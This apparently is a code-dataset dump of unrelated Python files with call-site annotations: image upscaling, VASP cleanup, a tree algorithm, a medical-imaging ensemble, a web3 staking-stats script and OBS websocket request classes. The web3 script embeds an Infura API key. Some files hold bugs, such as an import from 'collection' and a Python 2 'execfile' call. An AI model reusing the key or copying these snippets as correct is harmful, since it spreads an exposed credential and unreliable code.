model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
# determine model paths
model_path = os.path.join('experiments/pretrained_models', args.model_name + '.pth')
if not os.path.isfile(model_path):
model_path = os.path.join('realesrgan/weights', args.model_name + '.pth')
if not os.path.isfile(model_path):
raise ValueError(f'Model {args.model_name} does not exist.')
# restorer
upsampler = RealESRGANer(
scale=netscale,
model_path=model_path,
model=model,
tile=args.tile,
tile_pad=args.tile_pad,
pre_pad=args.pre_pad,
half=args.half)
if args.face_enhance: # Use GFPGAN for face enhancement
from gfpgan import GFPGANer
face_enhancer = GFPGANer(
model_path='https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth',
upscale=args.outscale,
arch='clean',
channel_multiplier=2,
bg_upsampler=upsampler)
os.makedirs(args.output, exist_ok=True)
if os.path.isfile(args.input):
paths = [args.input]
else:
paths = sorted(glob.glob(os.path.join(args.input, '*')))
for idx, path in enumerate(paths):
startTime = time.perf_counter()
imgname, extension = os.path.splitext(os.path.basename(path))
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
if len(img.shape) == 3 and img.shape[2] == 4:
img_mode = 'RGBA'
else:
img_mode = None
if args.ext == 'auto':
extension = "png"
else:
extension = args.ext
if img_mode == 'RGBA': # RGBA images should be saved in png format
extension = 'png'
save_path = os.path.join(args.output, f'{imgname}-{args.suffix}.{extension}')
if os.path.exists(save_path):
continue
try:
if args.face_enhance:
_, _, output = face_enhancer.enhance(img, has_aligned=False, only_center_face=False, paste_back=True)
else:
output, _ = upsampler.enhance(img, outscale=args.outscale)
except RuntimeError as error:
print('Error', error)
print('If you encounter CUDA out of memory, try to set --tile with a smaller number.')
else:
cv2.imwrite(save_path, output)
print(f'NO.{idx}, {imgname} is done, used {round((time.perf_counter() - startTime), 4)} seconds')
if __name__ == '__main__':
main()
| [((15, 13, 15, 38), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((71, 17, 71, 88), 'os.path.join', 'os.path.join', ({(71, 30, 71, 61): '"""experiments/pretrained_models"""', (71, 63, 71, 87): "args.model_name + '.pth'"}, {}), "('experiments/pretrained_models', args.model_name + '.pth')", False, 'import os\n'), ((78, 16, 85, 23), 'realesrgan.RealESRGANer', 'RealESRGANer', (), '', False, 'from realesrgan import RealESRGANer\n'), ((95, 4, 95, 43), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((97, 7, 97, 33), 'os.path.isfile', 'os.path.isfile', ({(97, 22, 97, 32): 'args.input'}, {}), '(args.input)', False, 'import os\n'), ((48, 16, 48, 102), 'basicsr.archs.rrdbnet_arch.RRDBNet', 'RRDBNet', (), '', False, 'from basicsr.archs.rrdbnet_arch import RRDBNet\n'), ((72, 11, 72, 37), 'os.path.isfile', 'os.path.isfile', ({(72, 26, 72, 36): 'model_path'}, {}), '(model_path)', False, 'import os\n'), ((73, 21, 73, 81), 'os.path.join', 'os.path.join', ({(73, 34, 73, 54): '"""realesrgan/weights"""', (73, 56, 73, 80): "args.model_name + '.pth'"}, {}), "('realesrgan/weights', args.model_name + '.pth')", False, 'import os\n'), ((74, 11, 74, 37), 'os.path.isfile', 'os.path.isfile', ({(74, 26, 74, 36): 'model_path'}, {}), '(model_path)', False, 'import os\n'), ((89, 24, 94, 35), 'gfpgan.GFPGANer', 'GFPGANer', (), '', False, 'from gfpgan import GFPGANer\n'), ((103, 20, 103, 39), 'time.perf_counter', 'time.perf_counter', ({}, {}), '()', False, 'import time\n'), ((107, 14, 107, 52), 'cv2.imread', 'cv2.imread', ({(107, 25, 107, 29): 'path', (107, 31, 107, 51): 'cv2.IMREAD_UNCHANGED'}, {}), '(path, cv2.IMREAD_UNCHANGED)', False, 'import cv2\n'), ((119, 20, 119, 85), 'os.path.join', 'os.path.join', ({(119, 33, 119, 44): 'args.output', (119, 46, 119, 84): 'f"""{imgname}-{args.suffix}.{extension}"""'}, {}), "(args.output, f'{imgname}-{args.suffix}.{extension}')", False, 'import os\n'), ((120, 11, 120, 36), 'os.path.exists', 'os.path.exists', ({(120, 26, 120, 35): 'save_path'}, {}), '(save_path)', False, 'import os\n'), ((51, 16, 51, 101), 'basicsr.archs.rrdbnet_arch.RRDBNet', 'RRDBNet', (), '', False, 'from basicsr.archs.rrdbnet_arch import RRDBNet\n'), ((104, 46, 104, 68), 'os.path.basename', 'os.path.basename', ({(104, 63, 104, 67): 'path'}, {}), '(path)', False, 'import os\n'), ((132, 12, 132, 42), 'cv2.imwrite', 'cv2.imwrite', ({(132, 24, 132, 33): 'save_path', (132, 35, 132, 41): 'output'}, {}), '(save_path, output)', False, 'import cv2\n'), ((54, 16, 54, 102), 'basicsr.archs.rrdbnet_arch.RRDBNet', 'RRDBNet', (), '', False, 'from basicsr.archs.rrdbnet_arch import RRDBNet\n'), ((100, 33, 100, 62), 'os.path.join', 'os.path.join', ({(100, 46, 100, 56): 'args.input', (100, 58, 100, 61): '"""*"""'}, {}), "(args.input, '*')", False, 'import os\n'), ((59, 16, 59, 113), 'realesrgan.archs.srvgg_arch.SRVGGNetCompact', 'SRVGGNetCompact', (), '', False, 'from realesrgan.archs.srvgg_arch import SRVGGNetCompact\n'), ((64, 16, 64, 113), 'realesrgan.archs.srvgg_arch.SRVGGNetCompact', 'SRVGGNetCompact', (), '', False, 'from realesrgan.archs.srvgg_arch import SRVGGNetCompact\n'), ((67, 16, 67, 101), 'basicsr.archs.rrdbnet_arch.RRDBNet', 'RRDBNet', (), '', False, 'from basicsr.archs.rrdbnet_arch import RRDBNet\n'), ((133, 62, 133, 81), 'time.perf_counter', 'time.perf_counter', ({}, {}), '()', False, 'import time\n')] |
eragasa/pypospack | examples/Fe__vasp/Fe_fcc_afm_D/Fe_fcc_afm_D_vac_A/clean_vasp.py | 21cdecaf3b05c87acc532d992be2c04d85bfbc22 | import os
filenames_delete = [
'CHG',
'CHGCAR',
'CONTCAR',
'DOSCAR',
'EIGENVAL',
'IBZKPT',
'job.err',
'job.out',
'OSZICAR',
'PCDAT',
'REPORT',
'vasp.log',
'vasprun.xml',
'WAVECAR',
'XDATCAR'
]
for filename in filenames_delete:
try:
os.remove(filename)
msg = "{} removed.".format(filename)
except FileNotFoundError as e:
msg = "{} does not exist.".format(filename)
except:
raise
print(msg)
| [((23, 8, 23, 27), 'os.remove', 'os.remove', ({(23, 18, 23, 26): 'filename'}, {}), '(filename)', False, 'import os\n')] |
ethyl2/code_challenges | binary_trees/largest_values_in_tree_rows.py | 3c9ccca1782f92728e60a515a7ca797f6d470e81 | '''
Sean Chen's solution.
See mine in largest_values_in_each_row.py
'''
from collection import deque
def largest_values_in_tree_rows(t):
rv = []
if t is None:
return rv
current_depth = 0
current_max = t.value
q = deque()
# add the root node to the queue at a depth of 0
q.append((t, current_depth))
while len(q) > 0:
node, depth = q.popleft()
# if the depth of the current node is different from
# `current_node`, add `current_max` to `rv` and then
# reset `current_max` and `current_depth`
if depth != current_depth:
rv.append(current_max)
current_max = node.value
current_depth = depth
# otherwise, we update `current_max` if we need to
else:
current_max = max(node.value, current_max)
# add the left and right children of the current node
# to the queue, along with their depths
if node.left:
q.append((node.left, depth + 1))
if node.right:
q.append((node.right, depth + 1))
# don't forget to append the last `current_max`
rv.append(current_max)
return rv
| [((17, 8, 17, 15), 'collection.deque', 'deque', ({}, {}), '()', False, 'from collection import deque\n')] |
RamsteinWR/PneumoniaRSNA1 | src/infer/_ExtractSimpleDeformTTA.py | 08bdba51292307a78ef711c6be4a63faea240ddf | import json
import os
import re
import numpy as np
import pandas as pd
from src.infer.ExtractDeformableTTA import MAPPINGS_PATH, test_image_set, METADATA_PATH, RCNN0_DETS_DIR
WDIR = os.path.dirname(os.path.abspath(__file__))
def get_results(det_folder, test_set, suffix):
filepath = os.path.join(det_folder, test_set, "results/detections_{}_results_{}.json".format(test_set, suffix))
with open(filepath) as f:
return json.load(f)
def flip_box(box):
"""
box (list, length 4): [x1, y1, w, h]
"""
# Get top right corner of prediction
x1 = box[0]
y1 = box[1]
w = box[2]
h = box[3]
topRight = (x1 + w, y1)
# Top left corner of flipped box is:
newTopLeft = (1024. - topRight[0], topRight[1])
return [newTopLeft[0], newTopLeft[1], w, h]
def convert_dict_to_df(results, mapping, metadata, test_set, flip=False, threshold=0.):
list_of_image_ids = []
list_of_scores = []
list_of_bboxes = []
for res in results:
coco_image_id = res["image_id"]
coco_img_file = "COCO_{}_{}.png".format(test_set, str(coco_image_id).zfill(12))
list_of_image_ids.append(mapping[coco_img_file])
list_of_scores.append(res["score"])
list_of_bboxes.append(res["bbox"])
if flip:
list_of_bboxes = [flip_box(_) for _ in list_of_bboxes]
results_df = pd.DataFrame({"patientId": [pid.split(".")[0] for pid in list_of_image_ids],
"score": list_of_scores,
"x": [box[0] for box in list_of_bboxes],
"y": [box[1] for box in list_of_bboxes],
"w": [box[2] for box in list_of_bboxes],
"h": [box[3] for box in list_of_bboxes],
"bbox": list_of_bboxes})
results_df = results_df.sort_values(["patientId", "score"], ascending=False)
results_df = results_df[results_df.score >= threshold]
results_df = results_df.merge(metadata, on="patientId", how="left")
return results_df[["patientId", "score", "x", "y", "w", "h", "bbox", "view"]]
with open(MAPPINGS_PATH) as f:
mapping = json.load(f)
with open(MAPPINGS_PATH.replace(test_image_set, "{}_flip".format(test_image_set))) as f:
flip_mapping = json.load(f)
metadata = pd.read_csv(METADATA_PATH)
def get_TTA_results(fold_imsize, test_image_set, MAIN_DIR):
TTAs = []
for test_set in [test_image_set, "{}_flip".format(test_image_set)]:
for suffix in ["original", "scale080", "scale120"]:
tmp_results = get_results(os.path.join(MAIN_DIR, "peepin_{}".format(fold_imsize, fold_imsize)),
test_set=test_set, suffix=suffix)
if re.search("_flip", test_set):
tmp_df = convert_dict_to_df(tmp_results,
flip_mapping,
metadata,
test_set=test_set,
flip=True,
threshold=0.01)
else:
tmp_df = convert_dict_to_df(tmp_results,
mapping,
metadata,
test_set=test_set,
flip=False,
threshold=0.01)
TTAs.append(tmp_df)
return TTAs
execfile(os.path.join(WDIR, "DetectionEnsemble.py"))
def run_ensemble(list_of_dfs, metadata, adjust_score=True):
list_of_pids = []
list_of_ensemble_bboxes = []
for pid in np.unique(metadata.patientId):
list_of_tmp_dfs = []
list_of_detections = []
view = metadata[metadata.patientId == pid]["view"].iloc[0]
for df_index, each_df in enumerate(list_of_dfs):
tmp_df = each_df[each_df.patientId == pid]
list_of_bboxes = []
for rownum, row in tmp_df.iterrows():
bbox = row.bbox
bbox.append(1)
bbox.append(row.score)
list_of_bboxes.append(bbox)
list_of_detections.append(list_of_bboxes)
from src.infer.DetectionEnsemble import GeneralEnsemble
list_of_ensemble_bboxes.append(GeneralEnsemble(list_of_detections, iou_thresh=0.4))
list_of_pids.append(pid)
# Create new DataFrame
list_of_new_pids = []
list_of_bboxes = []
for i, ensemble_bboxes in enumerate(list_of_ensemble_bboxes):
for bbox in ensemble_bboxes:
list_of_new_pids.append(list_of_pids[i])
list_of_bboxes.append(bbox)
ensemble_bbox_df = pd.DataFrame({"patientId": list_of_new_pids,
"x": [box[0] for box in list_of_bboxes],
"y": [box[1] for box in list_of_bboxes],
"w": [box[2] for box in list_of_bboxes],
"h": [box[3] for box in list_of_bboxes],
"score": [box[5] for box in list_of_bboxes],
"votes": [box[-1] for box in list_of_bboxes],
"bbox": list_of_bboxes})
if adjust_score:
ensemble_bbox_df["score"] = ensemble_bbox_df.score * ensemble_bbox_df.votes
return ensemble_bbox_df
imsizes = [224, 256, 288, 320, 352, 384, 416, 448, 480, 512]
fold0_nom = "fold{}_{}".format(0, imsizes[0])
fold1_nom = "fold{}_{}".format(1, imsizes[1])
fold2_nom = "fold{}_{}".format(2, imsizes[2])
fold3_nom = "fold{}_{}".format(3, imsizes[3])
fold4_nom = "fold{}_{}".format(4, imsizes[4])
fold5_nom = "fold{}_{}".format(5, imsizes[5])
fold6_nom = "fold{}_{}".format(6, imsizes[6])
fold7_nom = "fold{}_{}".format(7, imsizes[7])
fold8_nom = "fold{}_{}".format(8, imsizes[8])
fold9_nom = "fold{}_{}".format(9, imsizes[9])
fold1RCNN0 = run_ensemble(get_TTA_results("fold1_256", test_image_set, RCNN0_DETS_DIR.format(fold1_nom)), metadata)
fold3RCNN0 = run_ensemble(get_TTA_results("fold3_320", test_image_set, RCNN0_DETS_DIR.format(fold3_nom)), metadata)
fold5RCNN0 = run_ensemble(get_TTA_results("fold5_384", test_image_set, RCNN0_DETS_DIR.format(fold5_nom)), metadata)
fold7RCNN0 = run_ensemble(get_TTA_results("fold7_448", test_image_set, RCNN0_DETS_DIR.format(fold7_nom)), metadata)
fold9RCNN0 = run_ensemble(get_TTA_results("fold9_512", test_image_set, RCNN0_DETS_DIR.format(fold9_nom)), metadata)
list_of_dfs = [fold1RCNN0, fold3RCNN0, fold5RCNN0, fold7RCNN0, fold9RCNN0]
final_TTA_ensemble = run_ensemble(list_of_dfs, metadata, adjust_score=False)
final_TTA_ensemble["adjustedScore"] = final_TTA_ensemble.score * final_TTA_ensemble.votes
final_TTA_ensemble = final_TTA_ensemble[["patientId", "x", "y", "w", "h", "score", "votes", "adjustedScore"]]
final_TTA_ensemble.to_csv(os.path.join(WDIR, "../../SimpleDCNPredictions.csv"), index=False)
| [((65, 11, 65, 37), 'pandas.read_csv', 'pd.read_csv', ({(65, 23, 65, 36): 'METADATA_PATH'}, {}), '(METADATA_PATH)', True, 'import pandas as pd\n'), ((10, 23, 10, 48), 'os.path.abspath', 'os.path.abspath', ({(10, 39, 10, 47): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((60, 14, 60, 26), 'json.load', 'json.load', ({(60, 24, 60, 25): 'f'}, {}), '(f)', False, 'import json\n'), ((63, 19, 63, 31), 'json.load', 'json.load', ({(63, 29, 63, 30): 'f'}, {}), '(f)', False, 'import json\n'), ((92, 9, 92, 51), 'os.path.join', 'os.path.join', ({(92, 22, 92, 26): 'WDIR', (92, 28, 92, 50): '"""DetectionEnsemble.py"""'}, {}), "(WDIR, 'DetectionEnsemble.py')", False, 'import os\n'), ((98, 15, 98, 44), 'numpy.unique', 'np.unique', ({(98, 25, 98, 43): 'metadata.patientId'}, {}), '(metadata.patientId)', True, 'import numpy as np\n'), ((121, 23, 128, 61), 'pandas.DataFrame', 'pd.DataFrame', ({(121, 36, 128, 60): "{'patientId': list_of_new_pids, 'x': [box[0] for box in list_of_bboxes],\n 'y': [box[1] for box in list_of_bboxes], 'w': [box[2] for box in\n list_of_bboxes], 'h': [box[3] for box in list_of_bboxes], 'score': [box\n [5] for box in list_of_bboxes], 'votes': [box[-1] for box in\n list_of_bboxes], 'bbox': list_of_bboxes}"}, {}), "({'patientId': list_of_new_pids, 'x': [box[0] for box in\n list_of_bboxes], 'y': [box[1] for box in list_of_bboxes], 'w': [box[2] for\n box in list_of_bboxes], 'h': [box[3] for box in list_of_bboxes],\n 'score': [box[5] for box in list_of_bboxes], 'votes': [box[-1] for box in\n list_of_bboxes], 'bbox': list_of_bboxes})", True, 'import pandas as pd\n'), ((158, 26, 158, 78), 'os.path.join', 'os.path.join', ({(158, 39, 158, 43): 'WDIR', (158, 45, 158, 77): '"""../../SimpleDCNPredictions.csv"""'}, {}), "(WDIR, '../../SimpleDCNPredictions.csv')", False, 'import os\n'), ((16, 15, 16, 27), 'json.load', 'json.load', ({(16, 25, 16, 26): 'f'}, {}), '(f)', False, 'import json\n'), ((147, 71, 147, 103), 'src.infer.ExtractDeformableTTA.RCNN0_DETS_DIR.format', 'RCNN0_DETS_DIR.format', ({(147, 93, 147, 102): 'fold1_nom'}, {}), '(fold1_nom)', False, 'from src.infer.ExtractDeformableTTA import MAPPINGS_PATH, test_image_set, METADATA_PATH, RCNN0_DETS_DIR\n'), ((148, 71, 148, 103), 'src.infer.ExtractDeformableTTA.RCNN0_DETS_DIR.format', 'RCNN0_DETS_DIR.format', ({(148, 93, 148, 102): 'fold3_nom'}, {}), '(fold3_nom)', False, 'from src.infer.ExtractDeformableTTA import MAPPINGS_PATH, test_image_set, METADATA_PATH, RCNN0_DETS_DIR\n'), ((149, 71, 149, 103), 'src.infer.ExtractDeformableTTA.RCNN0_DETS_DIR.format', 'RCNN0_DETS_DIR.format', ({(149, 93, 149, 102): 'fold5_nom'}, {}), '(fold5_nom)', False, 'from src.infer.ExtractDeformableTTA import MAPPINGS_PATH, test_image_set, METADATA_PATH, RCNN0_DETS_DIR\n'), ((150, 71, 150, 103), 'src.infer.ExtractDeformableTTA.RCNN0_DETS_DIR.format', 'RCNN0_DETS_DIR.format', ({(150, 93, 150, 102): 'fold7_nom'}, {}), '(fold7_nom)', False, 'from src.infer.ExtractDeformableTTA import MAPPINGS_PATH, test_image_set, METADATA_PATH, RCNN0_DETS_DIR\n'), ((151, 71, 151, 103), 'src.infer.ExtractDeformableTTA.RCNN0_DETS_DIR.format', 'RCNN0_DETS_DIR.format', ({(151, 93, 151, 102): 'fold9_nom'}, {}), '(fold9_nom)', False, 'from src.infer.ExtractDeformableTTA import MAPPINGS_PATH, test_image_set, METADATA_PATH, RCNN0_DETS_DIR\n'), ((74, 15, 74, 43), 're.search', 're.search', ({(74, 25, 74, 32): '"""_flip"""', (74, 34, 74, 42): 'test_set'}, {}), "('_flip', test_set)", False, 'import re\n'), ((112, 39, 112, 90), 'src.infer.DetectionEnsemble.GeneralEnsemble', 'GeneralEnsemble', (), '', False, 'from src.infer.DetectionEnsemble import GeneralEnsemble\n')] |
yfii/yfiiapi | pool4.py | 2c0341b66108f99005dc5a40e3d1d30267f50bb5 | from web3 import Web3, HTTPProvider
import json
w3url = "https://mainnet.infura.io/v3/998f64f3627548bbaf2630599c1eefca"
w3 = Web3(HTTPProvider(w3url))
WETH = "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2"
YFII = "0xa1d0E215a23d7030842FC67cE582a6aFa3CCaB83"
DAI = "0x6B175474E89094C44Da98b954EedeAC495271d0F"
iUSDT = "0x72Cf258c852Dc485a853370171d46B9D29fD3184"
POOL4 = "0x3d367C9529f260B0661e1C1E91167C9319ee96cA"
yfii2dai = [YFII, WETH, DAI]
with open("abi/erc20.json") as f:
erc20ABI = json.loads(f.read())
with open("abi/uniswapRouterv2.json") as f:
uniswapABI = json.loads(f.read())
with open("abi/pool4.json") as f:
pool4ABI = json.loads(f.read())
uniswap_instance = w3.eth.contract(
abi=uniswapABI,
address=w3.toChecksumAddress("0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D"),
)
pool4_instance = w3.eth.contract(abi=pool4ABI, address=POOL4)
def getyfiiprice():
price = uniswap_instance.functions.getAmountsOut(
w3.toWei(1, "ether"), yfii2dai
).call()[-1]
return float(w3.fromWei(price, "ether"))
def _weekly_reward():
return pool4_instance.functions.rewardRate().call() / 1e18 * 60480
def _totalStakedAmount():
token_instance = w3.eth.contract(abi=erc20ABI, address=w3.toChecksumAddress(YFII))
return token_instance.functions.balanceOf(POOL4).call() / 1e18
def getDATA():
weekly_reward = (
pool4_instance.functions.rewardRate().call() / 1e6 * 7 * 24 * 60 * 60
)
token_instance = w3.eth.contract(abi=erc20ABI, address=w3.toChecksumAddress(YFII))
totalStakedAmount = token_instance.functions.balanceOf(POOL4).call() / 1e18
YFIIPrice = getyfiiprice()
TVL = totalStakedAmount * YFIIPrice
YFIWeeklyROI = (weekly_reward / TVL) * 100 / 1.01
apy = YFIWeeklyROI * 52
return {"apy": apy, "totalStakedAmount": totalStakedAmount, "TVL": TVL}
if __name__ == "__main__":
print(getDATA())
| [((6, 10, 6, 29), 'web3.HTTPProvider', 'HTTPProvider', ({(6, 23, 6, 28): 'w3url'}, {}), '(w3url)', False, 'from web3 import Web3, HTTPProvider\n')] |
PanBartosz/obs-websocket-py | obswebsocket/requests.py | e92960a475d3f1096a4ea41763cbc776b23f0a37 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# THIS FILE WAS GENERATED BY generate_classes.py - DO NOT EDIT #
# (Generated on 2020-12-20 18:26:33.661372) #
from .base_classes import Baserequests
class GetVersion(Baserequests):
"""Returns the latest version of the plugin and the API.
:Returns:
*version*
type: double
OBSRemote compatible API version. Fixed to 1.1 for retrocompatibility.
*obs_websocket_version*
type: String
obs-websocket plugin version.
*obs_studio_version*
type: String
OBS Studio program version.
*available_requests*
type: String
List of available request types, formatted as a comma-separated list string (e.g. : "Method1,Method2,Method3").
*supported_image_export_formats*
type: String
List of supported formats for features that use image export (like the TakeSourceScreenshot request type) formatted as a comma-separated list string
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetVersion'
self.datain['version'] = None
self.datain['obs-websocket-version'] = None
self.datain['obs-studio-version'] = None
self.datain['available-requests'] = None
self.datain['supported-image-export-formats'] = None
def getVersion(self):
return self.datain['version']
def getObsWebsocketVersion(self):
return self.datain['obs-websocket-version']
def getObsStudioVersion(self):
return self.datain['obs-studio-version']
def getAvailableRequests(self):
return self.datain['available-requests']
def getSupportedImageExportFormats(self):
return self.datain['supported-image-export-formats']
class GetAuthRequired(Baserequests):
"""Tells the client if authentication is required. If so, returns authentication parameters `challenge`
and `salt` (see "Authentication" for more information).
:Returns:
*authRequired*
type: boolean
Indicates whether authentication is required.
*challenge*
type: String (optional)
*salt*
type: String (optional)
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetAuthRequired'
self.datain['authRequired'] = None
self.datain['challenge'] = None
self.datain['salt'] = None
def getAuthRequired(self):
return self.datain['authRequired']
def getChallenge(self):
return self.datain['challenge']
def getSalt(self):
return self.datain['salt']
class Authenticate(Baserequests):
"""Attempt to authenticate the client to the server.
:Arguments:
*auth*
type: String
Response to the auth challenge (see "Authentication" for more information).
"""
def __init__(self, auth):
Baserequests.__init__(self)
self.name = 'Authenticate'
self.dataout['auth'] = auth
class SetHeartbeat(Baserequests):
"""Enable/disable sending of the Heartbeat event
:Arguments:
*enable*
type: boolean
Starts/Stops emitting heartbeat messages
"""
def __init__(self, enable):
Baserequests.__init__(self)
self.name = 'SetHeartbeat'
self.dataout['enable'] = enable
class SetFilenameFormatting(Baserequests):
"""Set the filename formatting string
:Arguments:
*filename_formatting*
type: String
Filename formatting string to set.
"""
def __init__(self, filename_formatting):
Baserequests.__init__(self)
self.name = 'SetFilenameFormatting'
self.dataout['filename-formatting'] = filename_formatting
class GetFilenameFormatting(Baserequests):
"""Get the filename formatting string
:Returns:
*filename_formatting*
type: String
Current filename formatting string.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetFilenameFormatting'
self.datain['filename-formatting'] = None
def getFilenameFormatting(self):
return self.datain['filename-formatting']
class GetStats(Baserequests):
"""Get OBS stats (almost the same info as provided in OBS' stats window)
:Returns:
*stats*
type: OBSStats
[OBS stats](#obsstats)
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetStats'
self.datain['stats'] = None
def getStats(self):
return self.datain['stats']
class BroadcastCustomMessage(Baserequests):
"""Broadcast custom message to all connected WebSocket clients
:Arguments:
*realm*
type: String
Identifier to be choosen by the client
*data*
type: Object
User-defined data
"""
def __init__(self, realm, data):
Baserequests.__init__(self)
self.name = 'BroadcastCustomMessage'
self.dataout['realm'] = realm
self.dataout['data'] = data
class GetVideoInfo(Baserequests):
"""Get basic OBS video information
:Returns:
*baseWidth*
type: int
Base (canvas) width
*baseHeight*
type: int
Base (canvas) height
*outputWidth*
type: int
Output width
*outputHeight*
type: int
Output height
*scaleType*
type: String
Scaling method used if output size differs from base size
*fps*
type: double
Frames rendered per second
*videoFormat*
type: String
Video color format
*colorSpace*
type: String
Color space for YUV
*colorRange*
type: String
Color range (full or partial)
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetVideoInfo'
self.datain['baseWidth'] = None
self.datain['baseHeight'] = None
self.datain['outputWidth'] = None
self.datain['outputHeight'] = None
self.datain['scaleType'] = None
self.datain['fps'] = None
self.datain['videoFormat'] = None
self.datain['colorSpace'] = None
self.datain['colorRange'] = None
def getBaseWidth(self):
return self.datain['baseWidth']
def getBaseHeight(self):
return self.datain['baseHeight']
def getOutputWidth(self):
return self.datain['outputWidth']
def getOutputHeight(self):
return self.datain['outputHeight']
def getScaleType(self):
return self.datain['scaleType']
def getFps(self):
return self.datain['fps']
def getVideoFormat(self):
return self.datain['videoFormat']
def getColorSpace(self):
return self.datain['colorSpace']
def getColorRange(self):
return self.datain['colorRange']
class OpenProjector(Baserequests):
"""Open a projector window or create a projector on a monitor. Requires OBS v24.0.4 or newer.
:Arguments:
*type*
type: String (Optional)
Type of projector: `Preview` (default), `Source`, `Scene`, `StudioProgram`, or `Multiview` (case insensitive).
*monitor*
type: int (Optional)
Monitor to open the projector on. If -1 or omitted, opens a window.
*geometry*
type: String (Optional)
Size and position of the projector window (only if monitor is -1). Encoded in Base64 using [Qt's geometry encoding](https://doc.qt.io/qt-5/qwidget.html#saveGeometry). Corresponds to OBS's saved projectors.
*name*
type: String (Optional)
Name of the source or scene to be displayed (ignored for other projector types).
"""
def __init__(self, type, monitor, geometry, name):
Baserequests.__init__(self)
self.name = 'OpenProjector'
self.dataout['type'] = type
self.dataout['monitor'] = monitor
self.dataout['geometry'] = geometry
self.dataout['name'] = name
class TriggerHotkeyByName(Baserequests):
"""Executes hotkey routine, identified by hotkey unique name
:Arguments:
*hotkeyName*
type: String
Unique name of the hotkey, as defined when registering the hotkey (e.g. "ReplayBuffer.Save")
"""
def __init__(self, hotkeyName):
Baserequests.__init__(self)
self.name = 'TriggerHotkeyByName'
self.dataout['hotkeyName'] = hotkeyName
class TriggerHotkeyBySequence(Baserequests):
"""Executes hotkey routine, identified by bound combination of keys. A single key combination might trigger multiple hotkey routines depending on user settings
:Arguments:
*keyId*
type: String
Main key identifier (e.g. `OBS_KEY_A` for key "A"). Available identifiers [here](https://github.com/obsproject/obs-studio/blob/master/libobs/obs-hotkeys.h)
*keyModifiers*
type: Object (Optional)
Optional key modifiers object. False entries can be ommitted
*keyModifiers.shift*
type: boolean
Trigger Shift Key
*keyModifiers.alt*
type: boolean
Trigger Alt Key
*keyModifiers.control*
type: boolean
Trigger Control (Ctrl) Key
*keyModifiers.command*
type: boolean
Trigger Command Key (Mac)
"""
def __init__(self, keyId, keyModifiers):
Baserequests.__init__(self)
self.name = 'TriggerHotkeyBySequence'
self.dataout['keyId'] = keyId
self.dataout['keyModifiers'] = keyModifiers
class PlayPauseMedia(Baserequests):
"""Pause or play a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
*playPause*
type: boolean
Whether to pause or play the source. `false` for play, `true` for pause.
"""
def __init__(self, sourceName, playPause):
Baserequests.__init__(self)
self.name = 'PlayPauseMedia'
self.dataout['sourceName'] = sourceName
self.dataout['playPause'] = playPause
class RestartMedia(Baserequests):
"""Restart a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'RestartMedia'
self.dataout['sourceName'] = sourceName
class StopMedia(Baserequests):
"""Stop a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'StopMedia'
self.dataout['sourceName'] = sourceName
class NextMedia(Baserequests):
"""Skip to the next media item in the playlist. Supports only vlc media source (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'NextMedia'
self.dataout['sourceName'] = sourceName
class PreviousMedia(Baserequests):
"""Go to the previous media item in the playlist. Supports only vlc media source (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'PreviousMedia'
self.dataout['sourceName'] = sourceName
class GetMediaDuration(Baserequests):
"""Get the length of media in milliseconds. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
Note: For some reason, for the first 5 or so seconds that the media is playing, the total duration can be off by upwards of 50ms.
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*mediaDuration*
type: int
The total length of media in milliseconds..
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetMediaDuration'
self.datain['mediaDuration'] = None
self.dataout['sourceName'] = sourceName
def getMediaDuration(self):
return self.datain['mediaDuration']
class GetMediaTime(Baserequests):
"""Get the current timestamp of media in milliseconds. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*timestamp*
type: int
The time in milliseconds since the start of the media.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetMediaTime'
self.datain['timestamp'] = None
self.dataout['sourceName'] = sourceName
def getTimestamp(self):
return self.datain['timestamp']
class SetMediaTime(Baserequests):
"""Set the timestamp of a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
*timestamp*
type: int
Milliseconds to set the timestamp to.
"""
def __init__(self, sourceName, timestamp):
Baserequests.__init__(self)
self.name = 'SetMediaTime'
self.dataout['sourceName'] = sourceName
self.dataout['timestamp'] = timestamp
class ScrubMedia(Baserequests):
"""Scrub media using a supplied offset. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
Note: Due to processing/network delays, this request is not perfect. The processing rate of this request has also not been tested.
:Arguments:
*sourceName*
type: String
Source name.
*timeOffset*
type: int
Millisecond offset (positive or negative) to offset the current media position.
"""
def __init__(self, sourceName, timeOffset):
Baserequests.__init__(self)
self.name = 'ScrubMedia'
self.dataout['sourceName'] = sourceName
self.dataout['timeOffset'] = timeOffset
